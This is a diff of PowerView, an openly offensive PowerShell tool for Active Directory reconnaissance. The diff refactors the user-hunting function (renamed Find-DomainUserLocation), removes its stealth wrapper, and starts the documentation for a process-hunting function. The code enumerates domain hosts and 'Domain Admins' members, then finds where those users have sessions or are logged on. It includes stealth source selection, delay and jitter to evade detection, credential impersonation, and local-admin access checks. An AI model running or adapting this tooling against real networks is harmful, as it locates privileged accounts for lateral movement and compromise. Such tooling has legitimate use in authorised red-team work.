+ [Parameter(ParameterSetName = 'UserGroupIdentity')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('GroupName', 'Group')]
+ [String[]]
+ $UserGroupIdentity = 'Domain Admins',
+ [Alias('AdminCount')]
[Switch]
- $AdminCount,
+ $UserAdminCount,
+ [Alias('AllowDelegation')]
[Switch]
- $AllowDelegation,
+ $UserAllowDelegation,
[Switch]
$CheckAccess,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
[Switch]
- $StopOnSuccess,
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
- $NoPing,
+ $StopOnSuccess,
- [UInt32]
+ [ValidateRange(1, 10000)]
+ [Int]
$Delay = 0,
+ [ValidateRange(0.0, 1.0)]
[Double]
$Jitter = .3,
- [String]
- $Domain,
-
- [String]
- $DomainController,
-
+ [Parameter(ParameterSetName = 'ShowAll')]
[Switch]
$ShowAll,
[Switch]
- $SearchForest,
-
- [Switch]
$Stealth,
[String]
- [ValidateSet("DFS","DC","File","All")]
- $StealthSource ="All",
-
- [Switch]
- $ForeignUsers,
+ [ValidateSet('DFS', 'DC', 'File', 'All')]
+ $StealthSource = 'All',
[Int]
- [ValidateRange(1,100)]
- $Threads,
-
- [UInt32]
- $Poll = 0
+ [ValidateRange(1, 100)]
+ $Threads = 20
)
- begin {
-
- if ($PSBoundParameters['Debug']) {
- $DebugPreference = 'Continue'
- }
-
- Write-Verbose "[*] Running Invoke-UserHunter with delay of $Delay"
-
- #####################################################
- #
- # First we build the host target set
- #
- #####################################################
-
- if($ComputerFile) {
- # if we're using a host list, read the targets in and add them to the target list
- $ComputerName = Get-Content -Path $ComputerFile
+ BEGIN {
+
+ $ComputerSearcherArguments = @{
+ 'Properties' = 'dnshostname'
+ }
+ if ($PSBoundParameters['Domain']) { $ComputerSearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
+ if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
+ if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+ if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
+ if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
+ if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
+ if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
+ if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
+
+ $UserSearcherArguments = @{
+ 'Properties' = 'samaccountname'
+ }
+ if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity }
+ if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain }
+ if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter }
+ if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase }
+ if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount }
+ if ($PSBoundParameters['UserAllowDelegation']) { $UserSearcherArguments['AllowDelegation'] = $UserAllowDelegation }
+ if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }
+
+ $TargetComputers = @()
+
+ # first, build the set of computers to enumerate
+ if ($PSBoundParameters['ComputerName']) {
+ $TargetComputers = @($ComputerName)
}
-
- if(!$ComputerName) {
- [Array]$ComputerName = @()
-
- if($Domain) {
- $TargetDomains = @($Domain)
- }
- elseif($SearchForest) {
- # get ALL the domains in the forest to search
- $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
- }
- else {
- # use the local domain
- $TargetDomains = @( (Get-NetDomain).name )
- }
-
- if($Stealth) {
- Write-Verbose "Stealth mode! Enumerating commonly used servers"
- Write-Verbose "Stealth source: $StealthSource"
-
- ForEach ($Domain in $TargetDomains) {
- if (($StealthSource -eq "File") -or ($StealthSource -eq "All")) {
- Write-Verbose "[*] Querying domain $Domain for File Servers..."
- $ComputerName += Get-NetFileServer -Domain $Domain -DomainController $DomainController
- }
- if (($StealthSource -eq "DFS") -or ($StealthSource -eq "All")) {
- Write-Verbose "[*] Querying domain $Domain for DFS Servers..."
- $ComputerName += Get-DFSshare -Domain $Domain -DomainController $DomainController | ForEach-Object {$_.RemoteServerName}
- }
- if (($StealthSource -eq "DC") -or ($StealthSource -eq "All")) {
- Write-Verbose "[*] Querying domain $Domain for Domain Controllers..."
- $ComputerName += Get-NetDomainController -LDAP -Domain $Domain -DomainController $DomainController | ForEach-Object { $_.dnshostname}
- }
+ else {
+ if ($PSBoundParameters['Stealth']) {
+ Write-Verbose "[Find-DomainUserLocation] Stealth enumeration using source: $StealthSource"
+ $TargetComputerArrayList = New-Object System.Collections.ArrayList
+
+ if ($StealthSource -match 'File|All') {
+ Write-Verbose '[Find-DomainUserLocation] Querying for file servers'
+ $FileServerSearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $FileServerSearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['ComputerDomain']) { $FileServerSearcherArguments['Domain'] = $ComputerDomain }
+ if ($PSBoundParameters['ComputerSearchBase']) { $FileServerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+ if ($PSBoundParameters['Server']) { $FileServerSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $FileServerSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $FileServerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $FileServerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $FileServerSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $FileServerSearcherArguments['Credential'] = $Credential }
+ $FileServers = Get-DomainFileServer @FileServerSearcherArguments
+ if ($FileServers -isnot [System.Array]) { $FileServers = @($FileServers) }
+ $TargetComputerArrayList.AddRange( $FileServers )
}
- }
- else {
- ForEach ($Domain in $TargetDomains) {
- Write-Verbose "[*] Querying domain $Domain for hosts"
-
- $Arguments = @{
- 'Domain' = $Domain
- 'DomainController' = $DomainController
- 'ADSpath' = $ADSpath
- 'Filter' = $ComputerFilter
- 'Unconstrained' = $Unconstrained
+ if ($StealthSource -match 'DFS|All') {
+ Write-Verbose '[Find-DomainUserLocation] Querying for DFS servers'
+ # # TODO: fix the passed parameters to Get-DomainDFSShare
+ # $ComputerName += Get-DomainDFSShare -Domain $Domain -Server $DomainController | ForEach-Object {$_.RemoteServerName}
+ }
+ if ($StealthSource -match 'DC|All') {
+ Write-Verbose '[Find-DomainUserLocation] Querying for domain controllers'
+ $DCSearcherArguments = @{
+ 'LDAP' = $True
}
-
- $ComputerName += Get-NetComputer @Arguments
+ if ($PSBoundParameters['Domain']) { $DCSearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['ComputerDomain']) { $DCSearcherArguments['Domain'] = $ComputerDomain }
+ if ($PSBoundParameters['Server']) { $DCSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['Credential']) { $DCSearcherArguments['Credential'] = $Credential }
+ $DomainControllers = Get-DomainController @DCSearcherArguments | Select-Object -ExpandProperty dnshostname
+ if ($DomainControllers -isnot [System.Array]) { $DomainControllers = @($DomainControllers) }
+ $TargetComputerArrayList.AddRange( $DomainControllers )
}
+ $TargetComputers = $TargetComputerArrayList.ToArray()
}
-
- # remove any null target hosts, uniquify the list and shuffle it
- $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
- if($($ComputerName.Count) -eq 0) {
- throw "No hosts found!"
+ else {
+ Write-Verbose '[Find-DomainUserLocation] Querying for all computers in the domain'
+ $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
}
}
-
- if ($Poll -gt 0) {
- Write-Verbose "[*] Polling for $Poll seconds. Automatically enabling threaded mode."
- if ($ComputerName.Count -gt 100) {
- throw "Too many hosts to poll! Try fewer than 100."
- }
- $Threads = $ComputerName.Count
+ Write-Verbose "[Find-DomainUserLocation] TargetComputers length: $($TargetComputers.Length)"
+ if ($TargetComputers.Length -eq 0) {
+ throw '[Find-DomainUserLocation] No hosts found to enumerate'
}
- #####################################################
- #
- # Now we build the user target set
- #
- #####################################################
-
- # users we're going to be searching for
- $TargetUsers = @()
-
# get the current user so we can ignore it in the results
- $CurrentUser = ([Environment]::UserName).toLower()
-
- # if we're showing all results, skip username enumeration
- if($ShowAll -or $ForeignUsers) {
- $User = New-Object PSObject
- $User | Add-Member Noteproperty 'MemberDomain' $Null
- $User | Add-Member Noteproperty 'MemberName' '*'
- $TargetUsers = @($User)
-
- if($ForeignUsers) {
- # if we're searching for user results not in the primary domain
- $krbtgtName = Convert-ADName -ObjectName "krbtgt@$($Domain)" -InputType Simple -OutputType NT4
- $DomainShortName = $krbtgtName.split("\")[0]
- }
- }
- # if we want to hunt for the effective domain users who can access a target server
- elseif($TargetServer) {
- Write-Verbose "Querying target server '$TargetServer' for local users"
- $TargetUsers = Get-NetLocalGroup $TargetServer -Recurse | Where-Object {(-not $_.IsGroup) -and $_.IsDomain } | ForEach-Object {
- $User = New-Object PSObject
- $User | Add-Member Noteproperty 'MemberDomain' ($_.AccountName).split("/")[0].toLower()
- $User | Add-Member Noteproperty 'MemberName' ($_.AccountName).split("/")[1].toLower()
- $User
- } | Where-Object {$_}
- }
- # if we get a specific username, only use that
- elseif($UserName) {
- Write-Verbose "[*] Using target user '$UserName'..."
- $User = New-Object PSObject
- if($TargetDomains) {
- $User | Add-Member Noteproperty 'MemberDomain' $TargetDomains[0]
- }
- else {
- $User | Add-Member Noteproperty 'MemberDomain' $Null
- }
- $User | Add-Member Noteproperty 'MemberName' $UserName.ToLower()
- $TargetUsers = @($User)
+ if ($PSBoundParameters['Credential']) {
+ $CurrentUser = $Credential.GetNetworkCredential().UserName
}
- # read in a target user list if we have one
- elseif($UserFile) {
- $TargetUsers = Get-Content -Path $UserFile | ForEach-Object {
- $User = New-Object PSObject
- if($TargetDomains) {
- $User | Add-Member Noteproperty 'MemberDomain' $TargetDomains[0]
- }
- else {
- $User | Add-Member Noteproperty 'MemberDomain' $Null
- }
- $User | Add-Member Noteproperty 'MemberName' $_
- $User
- } | Where-Object {$_}
+ else {
+ $CurrentUser = ([Environment]::UserName).ToLower()
}
- elseif($UserADSpath -or $UserFilter -or $AdminCount) {
- ForEach ($Domain in $TargetDomains) {
-
- $Arguments = @{
- 'Domain' = $Domain
- 'DomainController' = $DomainController
- 'ADSpath' = $UserADSpath
- 'Filter' = $UserFilter
- 'AdminCount' = $AdminCount
- 'AllowDelegation' = $AllowDelegation
- }
- Write-Verbose "[*] Querying domain $Domain for users"
- $TargetUsers += Get-NetUser @Arguments | ForEach-Object {
- $User = New-Object PSObject
- $User | Add-Member Noteproperty 'MemberDomain' $Domain
- $User | Add-Member Noteproperty 'MemberName' $_.samaccountname
- $User
- } | Where-Object {$_}
-
- }
+ # now build the user target set
+ if ($PSBoundParameters['ShowAll']) {
+ $TargetUsers = @()
+ }
+ elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) {
+ $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname
}
else {
- ForEach ($Domain in $TargetDomains) {
- Write-Verbose "[*] Querying domain $Domain for users of group '$GroupName'"
- $TargetUsers += Get-NetGroupMember -GroupName $GroupName -Domain $Domain -DomainController $DomainController
+ $GroupSearcherArguments = @{
+ 'Identity' = $UserGroupIdentity
+ 'Recurse' = $True
}
+ if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain }
+ if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase }
+ if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential }
+ $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName
}
- if (( (-not $ShowAll) -and (-not $ForeignUsers) ) -and ((!$TargetUsers) -or ($TargetUsers.Count -eq 0))) {
- throw "[!] No users found to search for!"
+ Write-Verbose "[Find-DomainUserLocation] TargetUsers length: $($TargetUsers.Length)"
+ if ((-not $ShowAll) -and ($TargetUsers.Length -eq 0)) {
+ throw '[Find-DomainUserLocation] No users found to target'
}
- # script block that enumerates a server
+ # the host enumeration block we're using to enumerate all servers
$HostEnumBlock = {
- param($ComputerName, $Ping, $TargetUsers, $CurrentUser, $Stealth, $DomainShortName, $Poll, $Delay, $Jitter)
-
- # optionally check if the server is up first
- $Up = $True
- if($Ping) {
- $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName
- }
- if($Up) {
- $Timer = [System.Diagnostics.Stopwatch]::StartNew()
- $RandNo = New-Object System.Random
-
- Do {
- if(!$DomainShortName) {
- # if we're not searching for foreign users, check session information
- $Sessions = Get-NetSession -ComputerName $ComputerName
- ForEach ($Session in $Sessions) {
- $UserName = $Session.sesi10_username
- $CName = $Session.sesi10_cname
-
- if($CName -and $CName.StartsWith("\\")) {
- $CName = $CName.TrimStart("\")
- }
+ Param($ComputerName, $TargetUsers, $CurrentUser, $Stealth, $TokenHandle)
- # make sure we have a result
- if (($UserName) -and ($UserName.trim() -ne '') -and (!($UserName -match $CurrentUser))) {
+ if ($TokenHandle) {
+ # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation
+ $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet
+ }
- $TargetUsers | Where-Object {$UserName -like $_.MemberName} | ForEach-Object {
+ ForEach ($TargetComputer in $ComputerName) {
+ $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
+ if ($Up) {
+ $Sessions = Get-NetSession -ComputerName $TargetComputer
+ ForEach ($Session in $Sessions) {
+ $UserName = $Session.UserName
+ $CName = $Session.CName
- $IPAddress = @(Get-IPAddress -ComputerName $ComputerName)[0].IPAddress
- $FoundUser = New-Object PSObject
- $FoundUser | Add-Member Noteproperty 'UserDomain' $_.MemberDomain
- $FoundUser | Add-Member Noteproperty 'UserName' $UserName
- $FoundUser | Add-Member Noteproperty 'ComputerName' $ComputerName
- $FoundUser | Add-Member Noteproperty 'IPAddress' $IPAddress
- $FoundUser | Add-Member Noteproperty 'SessionFrom' $CName
+ if ($CName -and $CName.StartsWith('\\')) {
+ $CName = $CName.TrimStart('\')
+ }
- # Try to resolve the DNS hostname of $Cname
- try {
- $CNameDNSName = [System.Net.Dns]::GetHostEntry($CName) | Select-Object -ExpandProperty HostName
- $FoundUser | Add-Member NoteProperty 'SessionFromName' $CnameDNSName
- }
- catch {
- $FoundUser | Add-Member NoteProperty 'SessionFromName' $Null
- }
+ # make sure we have a result, and ignore computer$ sessions
+ if (($UserName) -and ($UserName.Trim() -ne '') -and ($UserName -notmatch $CurrentUser) -and ($UserName -notmatch '\$$')) {
- # see if we're checking to see if we have local admin access on this machine
- if ($CheckAccess) {
- $Admin = Invoke-CheckLocalAdminAccess -ComputerName $CName
- $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin
- }
- else {
- $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Null
- }
- $FoundUser.PSObject.TypeNames.Add('PowerView.UserSession')
- $FoundUser
+ if ( (-not $TargetUsers) -or ($TargetUsers -contains $UserName)) {
+ $UserLocation = New-Object PSObject
+ $UserLocation | Add-Member Noteproperty 'UserDomain' $Null
+ $UserLocation | Add-Member Noteproperty 'UserName' $UserName
+ $UserLocation | Add-Member Noteproperty 'ComputerName' $TargetComputer
+ $UserLocation | Add-Member Noteproperty 'SessionFrom' $CName
+
+ # try to resolve the DNS hostname of $Cname
+ try {
+ $CNameDNSName = [System.Net.Dns]::GetHostEntry($CName) | Select-Object -ExpandProperty HostName
+ $UserLocation | Add-Member NoteProperty 'SessionFromName' $CnameDNSName
}
+ catch {
+ $UserLocation | Add-Member NoteProperty 'SessionFromName' $Null
+ }
+
+ # see if we're checking to see if we have local admin access on this machine
+ if ($CheckAccess) {
+ $Admin = (Test-AdminAccess -ComputerName $CName).IsAdmin
+ $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin
+ }
+ else {
+ $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Null
+ }
+ $UserLocation.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation')
+ $UserLocation
}
}
}
- if(!$Stealth) {
+ if (-not $Stealth) {
# if we're not 'stealthy', enumerate loggedon users as well
- $LoggedOn = Get-NetLoggedon -ComputerName $ComputerName
+ $LoggedOn = Get-NetLoggedon -ComputerName $TargetComputer
ForEach ($User in $LoggedOn) {
- $UserName = $User.wkui1_username
- # TODO: translate domain to authoratative name
- # then match domain name ?
- $UserDomain = $User.wkui1_logon_domain
+ $UserName = $User.UserName
+ $UserDomain = $User.LogonDomain
# make sure wet have a result
if (($UserName) -and ($UserName.trim() -ne '')) {
+ if ( (-not $TargetUsers) -or ($TargetUsers -contains $UserName) -and ($UserName -notmatch '\$$')) {
+ $IPAddress = @(Resolve-IPAddress -ComputerName $TargetComputer)[0].IPAddress
+ $UserLocation = New-Object PSObject
+ $UserLocation | Add-Member Noteproperty 'UserDomain' $UserDomain
+ $UserLocation | Add-Member Noteproperty 'UserName' $UserName
+ $UserLocation | Add-Member Noteproperty 'ComputerName' $TargetComputer
+ $UserLocation | Add-Member Noteproperty 'IPAddress' $IPAddress
+ $UserLocation | Add-Member Noteproperty 'SessionFrom' $Null
+ $UserLocation | Add-Member Noteproperty 'SessionFromName' $Null
- $TargetUsers | Where-Object {$UserName -like $_.MemberName} | ForEach-Object {
-
- $Proceed = $True
- if($DomainShortName) {
- if ($DomainShortName.ToLower() -ne $UserDomain.ToLower()) {
- $Proceed = $True
- }
- else {
- $Proceed = $False
- }
+ # see if we're checking to see if we have local admin access on this machine
+ if ($CheckAccess) {
+ $Admin = Test-AdminAccess -ComputerName $TargetComputer
+ $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin
}
- if($Proceed) {
- $IPAddress = @(Get-IPAddress -ComputerName $ComputerName)[0].IPAddress
- $FoundUser = New-Object PSObject
- $FoundUser | Add-Member Noteproperty 'UserDomain' $UserDomain
- $FoundUser | Add-Member Noteproperty 'UserName' $UserName
- $FoundUser | Add-Member Noteproperty 'ComputerName' $ComputerName
- $FoundUser | Add-Member Noteproperty 'IPAddress' $IPAddress
- $FoundUser | Add-Member Noteproperty 'SessionFrom' $Null
- $FoundUser | Add-Member Noteproperty 'SessionFromName' $Null
-
- # see if we're checking to see if we have local admin access on this machine
- if ($CheckAccess) {
- $Admin = Invoke-CheckLocalAdminAccess -ComputerName $ComputerName
- $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin
- }
- else {
- $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Null
- }
- $FoundUser.PSObject.TypeNames.Add('PowerView.UserSession')
- $FoundUser
+ else {
+ $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Null
}
+ $UserLocation.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation')
+ $UserLocation
}
}
}
}
+ }
+ }
- if ($Poll -gt 0) {
- Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
- }
- } While ($Poll -gt 0 -and $Timer.Elapsed.TotalSeconds -lt $Poll)
+ if ($TokenHandle) {
+ Invoke-RevertToSelf
}
}
- }
- process {
-
- if($Threads) {
- Write-Verbose "Using threading with threads = $Threads"
-
- # if we're using threading, kick off the script block with Invoke-ThreadedFunction
- $ScriptParams = @{
- 'Ping' = $(-not $NoPing)
- 'TargetUsers' = $TargetUsers
- 'CurrentUser' = $CurrentUser
- 'Stealth' = $Stealth
- 'DomainShortName' = $DomainShortName
- 'Poll' = $Poll
- 'Delay' = $Delay
- 'Jitter' = $Jitter
+ $LogonToken = $Null
+ if ($PSBoundParameters['Credential']) {
+ if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
+ }
+ else {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet
}
-
- # kick off the threaded script block + arguments
- Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
}
+ }
- else {
- if(-not $NoPing -and ($ComputerName.count -ne 1)) {
- # ping all hosts in parallel
- $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}
- $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100
- }
+ PROCESS {
+ # only ignore threading if -Delay is passed
+ if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
- Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"
+ Write-Verbose "[Find-DomainUserLocation] Total number of hosts: $($TargetComputers.count)"
+ Write-Verbose "[Find-DomainUserLocation] Delay: $Delay, Jitter: $Jitter"
$Counter = 0
$RandNo = New-Object System.Random
- ForEach ($Computer in $ComputerName) {
-
+ ForEach ($TargetComputer in $TargetComputers) {
$Counter = $Counter + 1
# sleep for our semi-randomized interval
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
- Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"
- $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False, $TargetUsers, $CurrentUser, $Stealth, $DomainShortName, 0, 0, 0
- $Result
+ Write-Verbose "[Find-DomainUserLocation] Enumerating server $Computer ($Counter of $($TargetComputers.Count))"
+ Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $TargetUsers, $CurrentUser, $Stealth, $LogonToken
- if($Result -and $StopOnSuccess) {
- Write-Verbose "[*] Target user found, returning early"
+ if ($Result -and $StopOnSuccess) {
+ Write-Verbose "[Find-DomainUserLocation] Target user found, returning early"
return
}
}
}
+ else {
+ Write-Verbose "[Find-DomainUserLocation] Using threading with threads: $Threads"
+ Write-Verbose "[Find-DomainUserLocation] TargetComputers length: $($TargetComputers.Length)"
+ # if we're using threading, kick off the script block with New-ThreadedFunction
+ $ScriptParams = @{
+ 'TargetUsers' = $TargetUsers
+ 'CurrentUser' = $CurrentUser
+ 'Stealth' = $Stealth
+ 'TokenHandle' = $LogonToken
+ }
+
+ # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
+ New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
+ }
+ }
+
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
+ }
}
}
-function Invoke-StealthUserHunter {
- [CmdletBinding()]
- param(
- [Parameter(Position=0,ValueFromPipeline=$True)]
- [Alias('Hosts')]
- [String[]]
- $ComputerName,
+function Find-DomainProcess {
+<#
+.SYNOPSIS
- [ValidateScript({Test-Path -Path $_ })]
- [Alias('HostList')]
- [String]
- $ComputerFile,
+Searches for processes on the domain using WMI, returning processes
+that match a particular user specification or process name.
- [String]
- $ComputerFilter,
+Thanks to @paulbrandau for the approach idea.
- [String]
- $ComputerADSpath,
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Get-WMIProcess, New-ThreadedFunction
- [String]
- $GroupName = 'Domain Admins',
+.DESCRIPTION
- [String]
- $TargetServer,
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and queries the domain for users of a specified group
+(default 'Domain Admins') with Get-DomainGroupMember. Then for each server the
+function enumerates any current processes running with Get-WMIProcess,
+searching for processes running under any target user contexts or with the
+specified -ProcessName. If -Credential is passed, it is passed through to
+the underlying WMI commands used to enumerate the remote machines.
- [String]
- $UserName,
+.PARAMETER ComputerName
- [String]
- $UserFilter,
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
- [String]
- $UserADSpath,
+.PARAMETER Domain
- [ValidateScript({Test-Path -Path $_ })]
- [String]
- $UserFile,
+Specifies the domain to query for computers AND users, defaults to the current domain.
- [Switch]
- $CheckAccess,
-
- [Switch]
- $StopOnSuccess,
-
- [Switch]
- $NoPing,
-
- [UInt32]
- $Delay = 0,
+.PARAMETER ComputerDomain
- [Double]
- $Jitter = .3,
+Specifies the domain to query for computers, defaults to the current domain.
- [String]
- $Domain,
+.PARAMETER ComputerLDAPFilter
- [Switch]
- $ShowAll,
+Specifies an LDAP query string that is used to search for computer objects.
- [Switch]
- $SearchForest,
+.PARAMETER ComputerSearchBase
- [String]
- [ValidateSet("DFS","DC","File","All")]
- $StealthSource ="All"
- )
- # kick off Invoke-UserHunter with stealth options
- Invoke-UserHunter -Stealth @PSBoundParameters
-}
+Specifies the LDAP source to search through for computers,
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
+.PARAMETER ComputerUnconstrained
-function Invoke-ProcessHunter {
-<#
- .SYNOPSIS
+Switch. Search computer objects that have unconstrained delegation.
- Query the process lists of remote machines, searching for
- processes with a specific name or owned by a specific user.
- Thanks to @paulbrandau for the approach idea.
-
- Author: @harmj0y
- License: BSD 3-Clause
+.PARAMETER ComputerOperatingSystem
- .PARAMETER ComputerName
+Search computers with a specific operating system, wildcards accepted.
- Host array to enumerate, passable on the pipeline.
+.PARAMETER ComputerServicePack
- .PARAMETER ComputerFile
+Search computers with a specific service pack, wildcards accepted.
- File of hostnames/IPs to search.
+.PARAMETER ComputerSiteName
- .PARAMETER ComputerFilter
+Search computers in the specific AD Site name, wildcards accepted.
- Host filter name to query AD for, wildcards accepted.
+.PARAMETER ProcessName
- .PARAMETER ComputerADSpath
+Search for processes with one or more specific names.
- The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+.PARAMETER UserIdentity
- .PARAMETER ProcessName
+Specifies one or more user identities to search for.
- The name of the process to hunt, or a comma separated list of names.
+.PARAMETER UserDomain
- .PARAMETER GroupName
+Specifies the domain to query for users to search for, defaults to the current domain.
- Group name to query for target users.
+.PARAMETER UserLDAPFilter
- .PARAMETER TargetServer
+Specifies an LDAP query string that is used to search for target users.
- Hunt for users who are effective local admins on a target server.
+.PARAMETER UserSearchBase
- .PARAMETER UserName
+Specifies the LDAP source to search through for target users.
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
- Specific username to search for.
+.PARAMETER UserGroupIdentity
- .PARAMETER UserFilter
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
- A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)"
+.PARAMETER UserAdminCount
- .PARAMETER UserADSpath
+Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged).
- The LDAP source to search through for users, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
